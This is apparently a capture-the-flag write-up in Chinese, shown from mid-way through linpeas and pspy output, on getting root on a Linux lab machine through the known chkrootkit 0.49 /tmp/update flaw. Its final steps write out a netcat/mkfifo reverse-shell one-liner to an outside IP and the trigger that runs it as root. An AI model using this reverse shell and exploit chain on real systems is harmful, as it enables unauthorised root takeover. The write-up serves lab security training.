/home/296640a3b825115a47b68fc44501c828
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory
/var/lib/php/sessions
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/hplip/base/password.py
/usr/share/hplip/base/__pycache__/password.cpython-37.pyc
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
2020-06-27 20:57:50 configure base-passwd:amd64 3.5.46 3.5.46
2020-06-27 20:57:50 install base-passwd:amd64 <none> 3.5.46
2020-06-27 20:57:50 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status half-installed base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status installed base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status half-installed base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:08 upgrade base-passwd:amd64 3.5.46 3.5.46
2020-06-27 20:58:16 install passwd:amd64 <none> 1:4.5-1.1
2020-06-27 20:58:16 status half-installed passwd:amd64 1:4.5-1.1
2020-06-27 20:58:17 status unpacked passwd:amd64 1:4.5-1.1
2020-06-27 20:58:26 configure base-passwd:amd64 3.5.46 <none>
2020-06-27 20:58:26 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:58:26 status installed base-passwd:amd64 3.5.46
2020-06-27 20:58:26 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:27 configure passwd:amd64 1:4.5-1.1 <none>
2020-06-27 20:58:27 status half-configured passwd:amd64 1:4.5-1.1
2020-06-27 20:58:27 status installed passwd:amd64 1:4.5-1.1
2020-06-27 20:58:27 status unpacked passwd:amd64 1:4.5-1.1
Description: Set up users and passwords
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls -alh
total 12K
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 .
drwxr-xr-x 4 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 7 2020 ..
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 0 Jun 27 2020 fich
drwxrwxrwx 2 root root 4.0K Jun 27 2020 logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls -alh
total 16K
drwxrwxrwx 2 root root 4.0K Jun 27 2020 .
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 ..
-rw-r--r-- 1 root root 7.7K Jun 27 2020 log.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0 PID=9 |
2020/06/27 18:56:57 CMD: UID=0 PID=8 |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659 | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658 | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657 | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653 | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652 | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=1000 PID=7645 | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=0 PID=6 |
2020/06/27 18:56:57 CMD: UID=0 PID=59 |
2020/06/27 18:56:57 CMD: UID=0 PID=50 |
2020/06/27 18:56:57 CMD: UID=0 PID=49 |
2020/06/27 18:56:57 CMD: UID=0 PID=481 | -bash
2020/06/27 18:56:57 CMD: UID=0 PID=48 |
2020/06/27 18:56:57 CMD: UID=0 PID=471 | (sd-pam)
2020/06/27 18:56:57 CMD: UID=0 PID=470 | /lib/systemd/systemd --user
2020/06/27 18:56:57 CMD: UID=0 PID=467 | sshd: root@pts/0
2020/06/27 18:56:57 CMD: UID=0 PID=424 | /usr/sbin/sshd -D
2020/06/27 18:56:57 CMD: UID=0 PID=423 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/06/27 18:56:57 CMD: UID=0 PID=422 | /usr/sbin/cups-browsed
2020/06/27 18:56:57 CMD: UID=107 PID=420 | avahi-daemon: chroot helper
2020/06/27 18:56:57 CMD: UID=0 PID=402 | /usr/sbin/cupsd -l
2020/06/27 18:56:57 CMD: UID=0 PID=401 | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2020/06/27 18:56:57 CMD: UID=104 PID=400 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/06/27 18:56:57 CMD: UID=0 PID=4 |
2020/06/27 18:56:57 CMD: UID=0 PID=399 | /usr/sbin/cron -f
2020/06/27 18:56:57 CMD: UID=0 PID=398 | /lib/systemd/systemd-logind
2020/06/27 18:56:57 CMD: UID=107 PID=396 | avahi-daemon: running [60832e9f188106ec5bcc4eb7709ce592.local]
2020/06/27 18:56:57 CMD: UID=0 PID=395 | /usr/sbin/rsyslogd -n -iNONE
2020/06/27 18:56:57 CMD: UID=0 PID=390 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2020/06/27 18:56:57 CMD: UID=0 PID=30 |
2020/06/27 18:56:57 CMD: UID=0 PID=3 |
2020/06/27 18:56:57 CMD: UID=0 PID=294 |
2020/06/27 18:56:57 CMD: UID=0 PID=292 |
2020/06/27 18:56:57 CMD: UID=0 PID=29 |
2020/06/27 18:56:57 CMD: UID=0 PID=28 |
2020/06/27 18:56:57 CMD: UID=0 PID=27 |
2020/06/27 18:56:57 CMD: UID=0 PID=26 |
2020/06/27 18:56:57 CMD: UID=101 PID=255 | /lib/systemd/systemd-timesyncd
2020/06/27 18:56:57 CMD: UID=0 PID=25 |
2020/06/27 18:56:57 CMD: UID=0 PID=245 | /lib/systemd/systemd-udevd
2020/06/27 18:56:57 CMD: UID=0 PID=24 |
2020/06/27 18:56:57 CMD: UID=0 PID=23 |
2020/06/27 18:56:57 CMD: UID=0 PID=222 | /lib/systemd/systemd-journald
2020/06/27 18:56:57 CMD: UID=0 PID=22 |
2020/06/27 18:56:57 CMD: UID=0 PID=21 |
2020/06/27 18:56:57 CMD: UID=0 PID=20 |
2020/06/27 18:56:57 CMD: UID=0 PID=2 |
2020/06/27 18:56:57 CMD: UID=0 PID=190 |
2020/06/27 18:56:57 CMD: UID=0 PID=19 |
2020/06/27 18:56:57 CMD: UID=0 PID=189 |
2020/06/27 18:56:57 CMD: UID=0 PID=187 |
2020/06/27 18:56:57 CMD: UID=0 PID=18 |
2020/06/27 18:56:57 CMD: UID=0 PID=17 |
2020/06/27 18:56:57 CMD: UID=0 PID=16 |
2020/06/27 18:56:57 CMD: UID=0 PID=153 |
2020/06/27 18:56:57 CMD: UID=0 PID=15 |
2020/06/27 18:56:57 CMD: UID=0 PID=14 |
2020/06/27 18:56:57 CMD: UID=0 PID=12378 | ./pspy
2020/06/27 18:56:57 CMD: UID=0 PID=12356 |
2020/06/27 18:56:57 CMD: UID=0 PID=12299 | -bash
2020/06/27 18:56:57 CMD: UID=0 PID=12293 | sshd: root@pts/2
2020/06/27 18:56:57 CMD: UID=0 PID=12275 |
2020/06/27 18:56:57 CMD: UID=0 PID=12248 |
2020/06/27 18:56:57 CMD: UID=0 PID=12247 |
2020/06/27 18:56:57 CMD: UID=0 PID=12178 |
2020/06/27 18:56:57 CMD: UID=0 PID=12121 |
2020/06/27 18:56:57 CMD: UID=0 PID=12 |
2020/06/27 18:56:57 CMD: UID=0 PID=112 |
2020/06/27 18:56:57 CMD: UID=0 PID=110 |
2020/06/27 18:56:57 CMD: UID=0 PID=11 |
2020/06/27 18:56:57 CMD: UID=0 PID=108 |
2020/06/27 18:56:57 CMD: UID=0 PID=107 |
2020/06/27 18:56:57 CMD: UID=0 PID=105 |
2020/06/27 18:56:57 CMD: UID=0 PID=104 |
2020/06/27 18:56:57 CMD: UID=0 PID=102 |
2020/06/27 18:56:57 CMD: UID=0 PID=10 |
2020/06/27 18:56:57 CMD: UID=0 PID=1 | /sbin/init
2020/06/27 18:56:58 CMD: UID=0 PID=12385 | -bash
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0 PID=12389 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12390 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12391 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12392 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12393 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12394 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12395 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12396 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12397 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12398 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12399 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12400 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12401 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12402 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12403 | -bash
Exiting program... (interrupt)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$
在日志中发现了chkrootkit-0.49
查询一下这个版本的chkrootkit有无漏洞
https://www.exploit-db.com/exploits/33899
这个exploit给出了提权的步骤
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
也就是说创建一个可执行的脚本,名字为Update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/bin/cat /tmp/update
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 5555 >/tmp/f
$ ls
然后执行
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
成功得到rootshell
STRIVE FOR PROGRESS,NOT FOR PERFECTION
